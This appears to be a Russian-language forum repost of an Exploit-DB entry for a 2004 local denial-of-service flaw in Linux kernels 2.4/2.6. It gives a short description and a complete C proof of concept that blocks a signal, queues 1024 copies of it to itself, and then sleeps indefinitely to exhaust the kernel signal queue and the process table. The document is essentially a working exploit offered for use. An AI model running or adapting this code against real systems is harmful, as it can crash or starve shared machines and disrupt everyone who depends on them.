Exploit Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23946
Проверка EDB
  1. Пройдено
Автор
NIKITA V. YOUSHCHENKO
Тип уязвимости
DOS
Платформа
LINUX
CVE
N/A
Дата публикации
2004-04-12
C:
/*
source: https://www.securityfocus.com/bid/10096/info

A vulnerability has been reported in the Linux Kernel that may permit a malicious local user to affect a system-wide denial of service condition. This issue may be triggered via the Kernel signal queue (struct sigqueue) and may be exploited to exhaust the system process table by causing an excessive number of threads to be left in a zombie state.
*/


#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
 
int main()
{
	sigset_t set;
	int i;
	pid_t pid;

	sigemptyset(&set);
	sigaddset(&set, 40);
	sigprocmask(SIG_BLOCK, &set, 0);

	pid = getpid();
	for (i = 0; i < 1024; i++)
		kill(pid, 40);

	while (1)
		sleep(1);
}
 
Источник
www.exploit-db.com

Похожие темы